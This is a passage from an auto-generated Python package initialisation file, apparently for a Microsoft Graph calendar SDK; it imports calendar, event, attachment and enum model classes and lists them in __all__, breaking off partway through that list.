from ._models_py3 import CollectionOfEvent15
from ._models_py3 import CollectionOfEvent16
from ._models_py3 import CollectionOfEvent17
from ._models_py3 import CollectionOfEvent18
from ._models_py3 import CollectionOfEvent19
from ._models_py3 import CollectionOfEvent2
from ._models_py3 import CollectionOfEvent20
from ._models_py3 import CollectionOfEvent21
from ._models_py3 import CollectionOfEvent22
from ._models_py3 import CollectionOfEvent23
from ._models_py3 import CollectionOfEvent24
from ._models_py3 import CollectionOfEvent25
from ._models_py3 import CollectionOfEvent26
from ._models_py3 import CollectionOfEvent27
from ._models_py3 import CollectionOfEvent28
from ._models_py3 import CollectionOfEvent29
from ._models_py3 import CollectionOfEvent3
from ._models_py3 import CollectionOfEvent30
from ._models_py3 import CollectionOfEvent31
from ._models_py3 import CollectionOfEvent32
from ._models_py3 import CollectionOfEvent33
from ._models_py3 import CollectionOfEvent34
from ._models_py3 import CollectionOfEvent35
from ._models_py3 import CollectionOfEvent36
from ._models_py3 import CollectionOfEvent37
from ._models_py3 import CollectionOfEvent38
from ._models_py3 import CollectionOfEvent39
from ._models_py3 import CollectionOfEvent4
from ._models_py3 import CollectionOfEvent40
from ._models_py3 import CollectionOfEvent41
from ._models_py3 import CollectionOfEvent42
from ._models_py3 import CollectionOfEvent5
from ._models_py3 import CollectionOfEvent6
from ._models_py3 import CollectionOfEvent7
from ._models_py3 import CollectionOfEvent8
from ._models_py3 import CollectionOfEvent9
from ._models_py3 import CollectionOfExtension
from ._models_py3 import CollectionOfExtension0
from ._models_py3 import CollectionOfExtension1
from ._models_py3 import CollectionOfExtension10
from ._models_py3 import CollectionOfExtension2
from ._models_py3 import CollectionOfExtension3
from ._models_py3 import CollectionOfExtension4
from ._models_py3 import CollectionOfExtension5
from ._models_py3 import CollectionOfExtension6
from ._models_py3 import CollectionOfExtension7
from ._models_py3 import CollectionOfExtension8
from ._models_py3 import CollectionOfExtension9
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty9
from ._models_py3 import CollectionOfPlace
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty9
from ._models_py3 import MicrosoftGraphAttachment
from ._models_py3 import MicrosoftGraphAttendee
from ._models_py3 import MicrosoftGraphAttendeeBase
from ._models_py3 import MicrosoftGraphCalendar
from ._models_py3 import MicrosoftGraphCalendarGroup
from ._models_py3 import MicrosoftGraphCalendarPermission
from ._models_py3 import MicrosoftGraphDateTimeZone
from ._models_py3 import MicrosoftGraphEmailAddress
from ._models_py3 import MicrosoftGraphEntity
from ._models_py3 import MicrosoftGraphEvent
from ._models_py3 import MicrosoftGraphExtension
from ._models_py3 import MicrosoftGraphItemBody
from ._models_py3 import MicrosoftGraphLocation
from ._models_py3 import MicrosoftGraphMultiValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphOnlineMeetingInfo
from ._models_py3 import MicrosoftGraphOutlookGeoCoordinates
from ._models_py3 import MicrosoftGraphOutlookItem
from ._models_py3 import MicrosoftGraphPatternedRecurrence
from ._models_py3 import MicrosoftGraphPhone
from ._models_py3 import MicrosoftGraphPhysicalAddress
from ._models_py3 import MicrosoftGraphPlace
from ._models_py3 import MicrosoftGraphRecipient
from ._models_py3 import MicrosoftGraphRecurrencePattern
from ._models_py3 import MicrosoftGraphRecurrenceRange
from ._models_py3 import MicrosoftGraphResponseStatus
from ._models_py3 import MicrosoftGraphSingleValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphTimeSlot
from ._models_py3 import OdataError
from ._models_py3 import OdataErrorDetail
from ._models_py3 import OdataErrorMain
except (SyntaxError, ImportError):
from ._models import CollectionOfAttachment # type: ignore
from ._models import CollectionOfAttachment0 # type: ignore
from ._models import CollectionOfAttachment1 # type: ignore
from ._models import CollectionOfAttachment10 # type: ignore
from ._models import CollectionOfAttachment2 # type: ignore
from ._models import CollectionOfAttachment3 # type: ignore
from ._models import CollectionOfAttachment4 # type: ignore
from ._models import CollectionOfAttachment5 # type: ignore
from ._models import CollectionOfAttachment6 # type: ignore
from ._models import CollectionOfAttachment7 # type: ignore
from ._models import CollectionOfAttachment8 # type: ignore
from ._models import CollectionOfAttachment9 # type: ignore
from ._models import CollectionOfCalendar # type: ignore
from ._models import CollectionOfCalendar0 # type: ignore
from ._models import CollectionOfCalendarGroup # type: ignore
from ._models import CollectionOfCalendarPermission # type: ignore
from ._models import CollectionOfCalendarPermission0 # type: ignore
from ._models import CollectionOfCalendarPermission1 # type: ignore
from ._models import CollectionOfCalendarPermission2 # type: ignore
from ._models import CollectionOfCalendarPermission3 # type: ignore
from ._models import CollectionOfCalendarPermission4 # type: ignore
from ._models import CollectionOfCalendarPermission5 # type: ignore
from ._models import CollectionOfCalendarPermission6 # type: ignore
from ._models import CollectionOfEvent # type: ignore
from ._models import CollectionOfEvent0 # type: ignore
from ._models import CollectionOfEvent1 # type: ignore
from ._models import CollectionOfEvent10 # type: ignore
from ._models import CollectionOfEvent11 # type: ignore
from ._models import CollectionOfEvent12 # type: ignore
from ._models import CollectionOfEvent13 # type: ignore
from ._models import CollectionOfEvent14 # type: ignore
from ._models import CollectionOfEvent15 # type: ignore
from ._models import CollectionOfEvent16 # type: ignore
from ._models import CollectionOfEvent17 # type: ignore
from ._models import CollectionOfEvent18 # type: ignore
from ._models import CollectionOfEvent19 # type: ignore
from ._models import CollectionOfEvent2 # type: ignore
from ._models import CollectionOfEvent20 # type: ignore
from ._models import CollectionOfEvent21 # type: ignore
from ._models import CollectionOfEvent22 # type: ignore
from ._models import CollectionOfEvent23 # type: ignore
from ._models import CollectionOfEvent24 # type: ignore
from ._models import CollectionOfEvent25 # type: ignore
from ._models import CollectionOfEvent26 # type: ignore
from ._models import CollectionOfEvent27 # type: ignore
from ._models import CollectionOfEvent28 # type: ignore
from ._models import CollectionOfEvent29 # type: ignore
from ._models import CollectionOfEvent3 # type: ignore
from ._models import CollectionOfEvent30 # type: ignore
from ._models import CollectionOfEvent31 # type: ignore
from ._models import CollectionOfEvent32 # type: ignore
from ._models import CollectionOfEvent33 # type: ignore
from ._models import CollectionOfEvent34 # type: ignore
from ._models import CollectionOfEvent35 # type: ignore
from ._models import CollectionOfEvent36 # type: ignore
from ._models import CollectionOfEvent37 # type: ignore
from ._models import CollectionOfEvent38 # type: ignore
from ._models import CollectionOfEvent39 # type: ignore
from ._models import CollectionOfEvent4 # type: ignore
from ._models import CollectionOfEvent40 # type: ignore
from ._models import CollectionOfEvent41 # type: ignore
from ._models import CollectionOfEvent42 # type: ignore
from ._models import CollectionOfEvent5 # type: ignore
from ._models import CollectionOfEvent6 # type: ignore
from ._models import CollectionOfEvent7 # type: ignore
from ._models import CollectionOfEvent8 # type: ignore
from ._models import CollectionOfEvent9 # type: ignore
from ._models import CollectionOfExtension # type: ignore
from ._models import CollectionOfExtension0 # type: ignore
from ._models import CollectionOfExtension1 # type: ignore
from ._models import CollectionOfExtension10 # type: ignore
from ._models import CollectionOfExtension2 # type: ignore
from ._models import CollectionOfExtension3 # type: ignore
from ._models import CollectionOfExtension4 # type: ignore
from ._models import CollectionOfExtension5 # type: ignore
from ._models import CollectionOfExtension6 # type: ignore
from ._models import CollectionOfExtension7 # type: ignore
from ._models import CollectionOfExtension8 # type: ignore
from ._models import CollectionOfExtension9 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty0 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty1 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty10 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty11 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty12 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty13 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty14 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty15 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty16 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty17 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty18 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty2 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty3 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty4 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty5 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty6 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty7 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty8 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty9 # type: ignore
from ._models import CollectionOfPlace # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty0 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty1 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty10 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty11 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty12 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty13 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty14 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty15 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty16 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty17 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty18 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty2 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty3 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty4 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty5 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty6 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty7 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty8 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty9 # type: ignore
from ._models import MicrosoftGraphAttachment # type: ignore
from ._models import MicrosoftGraphAttendee # type: ignore
from ._models import MicrosoftGraphAttendeeBase # type: ignore
from ._models import MicrosoftGraphCalendar # type: ignore
from ._models import MicrosoftGraphCalendarGroup # type: ignore
from ._models import MicrosoftGraphCalendarPermission # type: ignore
from ._models import MicrosoftGraphDateTimeZone # type: ignore
from ._models import MicrosoftGraphEmailAddress # type: ignore
from ._models import MicrosoftGraphEntity # type: ignore
from ._models import MicrosoftGraphEvent # type: ignore
from ._models import MicrosoftGraphExtension # type: ignore
from ._models import MicrosoftGraphItemBody # type: ignore
from ._models import MicrosoftGraphLocation # type: ignore
from ._models import MicrosoftGraphMultiValueLegacyExtendedProperty # type: ignore
from ._models import MicrosoftGraphOnlineMeetingInfo # type: ignore
from ._models import MicrosoftGraphOutlookGeoCoordinates # type: ignore
from ._models import MicrosoftGraphOutlookItem # type: ignore
from ._models import MicrosoftGraphPatternedRecurrence # type: ignore
from ._models import MicrosoftGraphPhone # type: ignore
from ._models import MicrosoftGraphPhysicalAddress # type: ignore
from ._models import MicrosoftGraphPlace # type: ignore
from ._models import MicrosoftGraphRecipient # type: ignore
from ._models import MicrosoftGraphRecurrencePattern # type: ignore
from ._models import MicrosoftGraphRecurrenceRange # type: ignore
from ._models import MicrosoftGraphResponseStatus # type: ignore
from ._models import MicrosoftGraphSingleValueLegacyExtendedProperty # type: ignore
from ._models import MicrosoftGraphTimeSlot # type: ignore
from ._models import OdataError # type: ignore
from ._models import OdataErrorDetail # type: ignore
from ._models import OdataErrorMain # type: ignore
from ._calendar_enums import (
Enum100,
Enum101,
Enum102,
Enum103,
Enum104,
Enum105,
Enum106,
Enum107,
Enum108,
Enum109,
Enum110,
Enum111,
Enum112,
Enum113,
Enum114,
Enum115,
Enum116,
Enum117,
Enum118,
Enum119,
Enum120,
Enum121,
Enum122,
Enum123,
Enum124,
Enum125,
Enum126,
Enum127,
Enum128,
Enum129,
Enum130,
Enum131,
Enum132,
Enum133,
Enum134,
Enum135,
Enum136,
Enum137,
Enum138,
Enum139,
Enum140,
Enum141,
Enum142,
Enum143,
Enum144,
Enum145,
Enum146,
Enum147,
Enum148,
Enum149,
Enum150,
Enum151,
Enum152,
Enum153,
Enum154,
Enum155,
Enum156,
Enum157,
Enum158,
Enum159,
Enum160,
Enum161,
Enum162,
Enum163,
Enum164,
Enum165,
Enum166,
Enum167,
Enum168,
Enum169,
Enum170,
Enum171,
Enum172,
Enum173,
Enum174,
Enum175,
Enum176,
Enum177,
Enum178,
Enum179,
Enum180,
Enum181,
Enum182,
Enum183,
Enum184,
Enum185,
Enum186,
Enum187,
Enum188,
Enum189,
Enum190,
Enum191,
Enum192,
Enum193,
Enum194,
Enum195,
Enum196,
Enum197,
Enum198,
Enum199,
Enum200,
Enum201,
Enum202,
Enum203,
Enum204,
Enum205,
Enum206,
Enum207,
Enum208,
Enum209,
Enum210,
Enum211,
Enum212,
Enum213,
Enum214,
Enum215,
Enum216,
Enum217,
Enum218,
Enum219,
Enum22,
Enum220,
Enum221,
Enum222,
Enum223,
Enum224,
Enum225,
Enum226,
Enum227,
Enum228,
Enum229,
Enum23,
Enum230,
Enum231,
Enum232,
Enum233,
Enum234,
Enum235,
Enum236,
Enum237,
Enum238,
Enum239,
Enum240,
Enum241,
Enum242,
Enum243,
Enum244,
Enum245,
Enum246,
Enum247,
Enum248,
Enum249,
Enum250,
Enum251,
Enum252,
Enum253,
Enum254,
Enum255,
Enum256,
Enum257,
Enum258,
Enum259,
Enum260,
Enum261,
Enum262,
Enum263,
Enum264,
Enum265,
Enum266,
Enum267,
Enum268,
Enum269,
Enum270,
Enum271,
Enum272,
Enum273,
Enum274,
Enum275,
Enum276,
Enum277,
Enum278,
Enum279,
Enum28,
Enum280,
Enum281,
Enum282,
Enum283,
Enum284,
Enum285,
Enum286,
Enum287,
Enum288,
Enum289,
Enum29,
Enum290,
Enum291,
Enum292,
Enum293,
Enum294,
Enum295,
Enum296,
Enum297,
Enum298,
Enum299,
Enum30,
Enum300,
Enum301,
Enum302,
Enum303,
Enum304,
Enum305,
Enum306,
Enum307,
Enum308,
Enum309,
Enum31,
Enum310,
Enum311,
Enum312,
Enum313,
Enum314,
Enum315,
Enum316,
Enum317,
Enum318,
Enum319,
Enum32,
Enum320,
Enum321,
Enum322,
Enum323,
Enum324,
Enum325,
Enum326,
Enum327,
Enum328,
Enum329,
Enum33,
Enum330,
Enum331,
Enum332,
Enum333,
Enum334,
Enum335,
Enum336,
Enum337,
Enum338,
Enum339,
Enum34,
Enum340,
Enum341,
Enum342,
Enum343,
Enum344,
Enum345,
Enum346,
Enum347,
Enum348,
Enum349,
Enum35,
Enum350,
Enum351,
Enum352,
Enum353,
Enum354,
Enum355,
Enum356,
Enum357,
Enum358,
Enum359,
Enum36,
Enum360,
Enum361,
Enum362,
Enum363,
Enum364,
Enum365,
Enum366,
Enum367,
Enum368,
Enum369,
Enum37,
Enum370,
Enum371,
Enum372,
Enum373,
Enum374,
Enum375,
Enum376,
Enum377,
Enum378,
Enum379,
Enum38,
Enum380,
Enum381,
Enum382,
Enum383,
Enum384,
Enum385,
Enum386,
Enum387,
Enum388,
Enum389,
Enum39,
Enum390,
Enum391,
Enum392,
Enum393,
Enum394,
Enum395,
Enum396,
Enum397,
Enum398,
Enum399,
Enum40,
Enum400,
Enum401,
Enum402,
Enum403,
Enum404,
Enum405,
Enum406,
Enum407,
Enum408,
Enum409,
Enum41,
Enum410,
Enum411,
Enum412,
Enum413,
Enum414,
Enum415,
Enum416,
Enum417,
Enum418,
Enum419,
Enum42,
Enum420,
Enum421,
Enum422,
Enum423,
Enum424,
Enum425,
Enum426,
Enum427,
Enum428,
Enum429,
Enum43,
Enum430,
Enum431,
Enum432,
Enum433,
Enum434,
Enum435,
Enum436,
Enum437,
Enum438,
Enum439,
Enum44,
Enum440,
Enum441,
Enum442,
Enum443,
Enum444,
Enum445,
Enum446,
Enum447,
Enum448,
Enum449,
Enum45,
Enum450,
Enum451,
Enum452,
Enum453,
Enum454,
Enum455,
Enum456,
Enum457,
Enum458,
Enum459,
Enum46,
Enum460,
Enum461,
Enum462,
Enum463,
Enum464,
Enum465,
Enum466,
Enum467,
Enum468,
Enum469,
Enum47,
Enum470,
Enum471,
Enum472,
Enum473,
Enum474,
Enum475,
Enum48,
Enum49,
Enum50,
Enum51,
Enum52,
Enum53,
Enum54,
Enum55,
Enum56,
Enum57,
Enum58,
Enum59,
Enum60,
Enum61,
Enum62,
Enum63,
Enum64,
Enum65,
Enum66,
Enum67,
Enum68,
Enum69,
Enum70,
Enum71,
Enum72,
Enum73,
Enum74,
Enum75,
Enum76,
Enum77,
Enum78,
Enum79,
Enum80,
Enum81,
Enum82,
Enum83,
Enum84,
Enum85,
Enum86,
Enum87,
Enum88,
Enum89,
Enum90,
Enum91,
Enum92,
Enum93,
Enum94,
Enum95,
Enum96,
Enum97,
Enum98,
Enum99,
Get10ItemsItem,
Get1ItemsItem,
Get2ItemsItem,
Get4ItemsItem,
Get5ItemsItem,
Get6ItemsItem,
Get7ItemsItem,
Get9ItemsItem,
MicrosoftGraphAttendeeType,
MicrosoftGraphBodyType,
MicrosoftGraphCalendarColor,
MicrosoftGraphCalendarRoleType,
MicrosoftGraphDayOfWeek,
MicrosoftGraphEventType,
MicrosoftGraphFreeBusyStatus,
MicrosoftGraphImportance,
MicrosoftGraphLocationType,
MicrosoftGraphLocationUniqueIdType,
MicrosoftGraphOnlineMeetingProviderType,
MicrosoftGraphPhoneType,
MicrosoftGraphPhysicalAddressType,
MicrosoftGraphRecurrencePatternType,
MicrosoftGraphRecurrenceRangeType,
MicrosoftGraphResponseType,
MicrosoftGraphSensitivity,
MicrosoftGraphWeekIndex,
)
__all__ = [
'CollectionOfAttachment',
'CollectionOfAttachment0',
'CollectionOfAttachment1',
'CollectionOfAttachment10',
'CollectionOfAttachment2',
'CollectionOfAttachment3',
'CollectionOfAttachment4',
'CollectionOfAttachment5',
'CollectionOfAttachment6',
'CollectionOfAttachment7',
'CollectionOfAttachment8',
'CollectionOfAttachment9',
'CollectionOfCalendar',
'CollectionOfCalendar0',
'CollectionOfCalendarGroup',
'CollectionOfCalendarPermission',
'CollectionOfCalendarPermission0',
'CollectionOfCalendarPermission1',
'CollectionOfCalendarPermission2',
'CollectionOfCalendarPermission3',
'CollectionOfCalendarPermission4',
'CollectionOfCalendarPermission5',
'CollectionOfCalendarPermission6',
'CollectionOfEvent',
'CollectionOfEvent0',
'CollectionOfEvent1',
'CollectionOfEvent10',
'CollectionOfEvent11',
'CollectionOfEvent12',
'CollectionOfEvent13',
'CollectionOfEvent14',
'CollectionOfEvent15',
'CollectionOfEvent16',
'CollectionOfEvent17',
'CollectionOfEvent18',
'CollectionOfEvent19',
'CollectionOfEvent2',
'CollectionOfEvent20',
'CollectionOfEvent21',
'CollectionOfEvent22',
'CollectionOfEvent23',
'CollectionOfEvent24',
'CollectionOfEvent25',
'CollectionOfEvent26',
'CollectionOfEvent27',
'CollectionOfEvent28',
'CollectionOfEvent29',
'CollectionOfEvent3',
'CollectionOfEvent30',
'CollectionOfEvent31',
'CollectionOfEvent32',
'CollectionOfEvent33',
'CollectionOfEvent34',
'CollectionOfEvent35',
'CollectionOfEvent36',
'CollectionOfEvent37',
'CollectionOfEvent38',
'CollectionOfEvent39',
'CollectionOfEvent4',
'CollectionOfEvent40',
'CollectionOfEvent41',
'CollectionOfEvent42',
'CollectionOfEvent5',
'CollectionOfEvent6',
'CollectionOfEvent7',
'CollectionOfEvent8',
'CollectionOfEvent9',
'CollectionOfExtension',
'CollectionOfExtension0',
'CollectionOfExtension1',
'CollectionOfExtension10',
'CollectionOfExtension2',
'CollectionOfExtension3',
'CollectionOfExtension4',
'CollectionOfExtension5',
'CollectionOfExtension6',
'CollectionOfExtension7',
'CollectionOfExtension8',
'CollectionOfExtension9',
'CollectionOfMultiValueLegacyExtendedProperty',
'CollectionOfMultiValueLegacyExtendedProperty0',
'CollectionOfMultiValueLegacyExtendedProperty1',
'CollectionOfMultiValueLegacyExtendedProperty10',
'CollectionOfMultiValueLegacyExtendedProperty11',
'CollectionOfMultiValueLegacyExtendedProperty12',
'CollectionOfMultiValueLegacyExtendedProperty13',
'CollectionOfMultiValueLegacyExtendedProperty14',
'CollectionOfMultiValueLegacyExtendedProperty15',
'CollectionOfMultiValueLegacyExtendedProperty16',
'CollectionOfMultiValueLegacyExtendedProperty17',
'CollectionOfMultiValueLegacyExtendedProperty18',
'CollectionOfMultiValueLegacyExtendedProperty2',
'CollectionOfMultiValueLegacyExtendedProperty3',
'CollectionOfMultiValueLegacyExtendedProperty4',
'CollectionOfMultiValueLegacyExtendedProperty5',
'CollectionOfMultiValueLegacyExtendedProperty6',
'CollectionOfMultiValueLegacyExtendedProperty7',
'CollectionOfMultiValueLegacyExtendedProperty8',
'CollectionOfMultiValueLegacyExtendedProperty9',
'CollectionOfPlace',
'CollectionOfSingleValueLegacyExtendedProperty',
'CollectionOfSingleValueLegacyExtendedProperty0',
'CollectionOfSingleValueLegacyExtendedProperty1',
'CollectionOfSingleValueLegacyExtendedProperty10',
'CollectionOfSingleValueLegacyExtendedProperty11',
'CollectionOfSingleValueLegacyExtendedProperty12',
'CollectionOfSingleValueLegacyExtendedProperty13',
'CollectionOfSingleValueLegacyExtendedProperty14',
'CollectionOfSingleValueLegacyExtendedProperty15',
'CollectionOfSingleValueLegacyExtendedProperty16',
'CollectionOfSingleValueLegacyExtendedProperty17',
'CollectionOfSingleValueLegacyExtendedProperty18',
'CollectionOfSingleValueLegacyExtendedProperty2',
'CollectionOfSingleValueLegacyExtendedProperty3',
'CollectionOfSingleValueLegacyExtendedProperty4',
'CollectionOfSingleValueLegacyExtendedProperty5',
'CollectionOfSingleValueLegacyExtendedProperty6',
'CollectionOfSingleValueLegacyExtendedProperty7',
'CollectionOfSingleValueLegacyExtendedProperty8',
'CollectionOfSingleValueLegacyExtendedProperty9',
'MicrosoftGraphAttachment',
'MicrosoftGraphAttendee',
'MicrosoftGraphAttendeeBase',
'MicrosoftGraphCalendar',
'MicrosoftGraphCalendarGroup',
'MicrosoftGraphCalendarPermission',
'MicrosoftGraphDateTimeZone',
'MicrosoftGraphEmailAddress',
'MicrosoftGraphEntity',
'MicrosoftGraphEvent',
'MicrosoftGraphExtension',
'MicrosoftGraphItemBody',
'MicrosoftGraphLocation',
'MicrosoftGraphMultiValueLegacyExtendedProperty',
'MicrosoftGraphOnlineMeetingInfo',
'MicrosoftGraphOutlookGeoCoordinates',
'MicrosoftGraphOutlookItem',
'MicrosoftGraphPatternedRecurrence',
'MicrosoftGraphPhone',
'MicrosoftGraphPhysicalAddress',
'MicrosoftGraphPlace',
'MicrosoftGraphRecipient',
'MicrosoftGraphRecurrencePattern',
'MicrosoftGraphRecurrenceRange',
'MicrosoftGraphResponseStatus',
'MicrosoftGraphSingleValueLegacyExtendedProperty',
'MicrosoftGraphTimeSlot',
'OdataError',
'OdataErrorDetail',
'OdataErrorMain',
'Enum100',
'Enum101',
'Enum102',
'Enum103',
'Enum104',
'Enum105',
'Enum106',
'Enum107',
'Enum108',
'Enum109',
'Enum110',
'Enum111',
'Enum112',
'Enum113',
'Enum114',
'Enum115',
'Enum116',
'Enum117',
'Enum118',
'Enum119',
'Enum120',
'Enum121',
'Enum122',
'Enum123',
'Enum124',
'Enum125',
'Enum126',
'Enum127',
'Enum128',
'Enum129',
'Enum130',
'Enum131',
'Enum132',
'Enum133',
'Enum134',
'Enum135',
'Enum136',
'Enum137',
'Enum138',
'Enum139',
'Enum140',
'Enum141',
'Enum142',
'Enum143',
'Enum144',
'Enum145',
'Enum146',
'Enum147',
'Enum148',
'Enum149',
'Enum150',
'Enum151',
'Enum152',
'Enum153',
'Enum154',
'Enum155',
'Enum156',
'Enum157',
'Enum158',
'Enum159',
'Enum160',
'Enum161',
'Enum162',
'Enum163',
'Enum164',
'Enum165',
'Enum166',
'Enum167',
'Enum168',
'Enum169',
'Enum170',
'Enum171',
'Enum172',
'Enum173',
'Enum174',
'Enum175',
'Enum176',
'Enum177',
'Enum178',
'Enum179',
'Enum180',
'Enum181',
'Enum182',
'Enum183',
'Enum184',
'Enum185',
'Enum186',
'Enum187',
'Enum188',
'Enum189',
'Enum190',
'Enum191',
'Enum192',
'Enum193',
'Enum194',
'Enum195',
'Enum196',
'Enum197',
'Enum198',
'Enum199',
'Enum200',
'Enum201',
'Enum202',
'Enum203',
'Enum204',
'Enum205',
'Enum206',
'Enum207',
'Enum208',
'Enum209',
'Enum210',
'Enum211',
'Enum212',
'Enum213',
'Enum214',
'Enum215',
'Enum216',
'Enum217',
'Enum218',
'Enum219',
'Enum22',
'Enum220',
'Enum221',
'Enum222',
'Enum223',
'Enum224',
'Enum225',
'Enum226',
'Enum227',
'Enum228',
'Enum229',
'Enum23',
'Enum230',
'Enum231',
'Enum232',
'Enum233',
'Enum234',
'Enum235',
'Enum236',
'Enum237',
'Enum238',
'Enum239',
'Enum240',
'Enum241',
'Enum242',
'Enum243',
'Enum244',
'Enum245',
'Enum246',
'Enum247',
'Enum248',
'Enum249',
'Enum250',
'Enum251',
'Enum252',
'Enum253',
'Enum254',
'Enum255',
'Enum256',
'Enum257',
'Enum258',
'Enum259',
'Enum260',
'Enum261',
'Enum262',
'Enum263',
'Enum264',
'Enum265',
'Enum266',
'Enum267',
'Enum268',
'Enum269',
'Enum270',
'Enum271',
'Enum272',
'Enum273',
'Enum274',
'Enum275',
'Enum276',
'Enum277',
'Enum278',
'Enum279',
'Enum28',
'Enum280',
'Enum281',
'Enum282',
'Enum283',
'Enum284',
'Enum285',
'Enum286',
'Enum287',
'Enum288',
'Enum289',
'Enum29',
'Enum290',
'Enum291',
'Enum292',
'Enum293',
'Enum294',
'Enum295',
'Enum296',
'Enum297',
'Enum298',
'Enum299',
'Enum30',
'Enum300',
'Enum301',
'Enum302',
'Enum303',
'Enum304',
'Enum305',
'Enum306',
'Enum307',
'Enum308',
'Enum309',
'Enum31',
'Enum310',
'Enum311',
'Enum312',
'Enum313',
'Enum314',
'Enum315',
'Enum316',
'Enum317',
'Enum318',
'Enum319',
'Enum32',
'Enum320',
'Enum321',
'Enum322',
'Enum323',
'Enum324',
'Enum325',
'Enum326',
'Enum327',
'Enum328',
'Enum329',
'Enum33',
'Enum330',
'Enum331',
'Enum332',
'Enum333',
'Enum334',
'Enum335',
'Enum336',
'Enum337',
'Enum338',
'Enum339',
'Enum34',
'Enum340',
'Enum341',
'Enum342',
'Enum343',
'Enum344',
'Enum345',
'Enum346',
'Enum347',
'Enum348',
'Enum349',
'Enum35',
'Enum350',
'Enum351',
'Enum352',
'Enum353',
'Enum354',
'Enum355',
'Enum356',
'Enum357',
'Enum358',
'Enum359',
'Enum36',
'Enum360',
'Enum361',
'Enum362',
'Enum363',
'Enum364',
'Enum365',
'Enum366',
'Enum367',
'Enum368',
'Enum369',
'Enum37',
'Enum370',
'Enum371',
'Enum372',
'Enum373',
'Enum374',
'Enum375',
'Enum376',
'Enum377',
'Enum378',
'Enum379',
'Enum38',
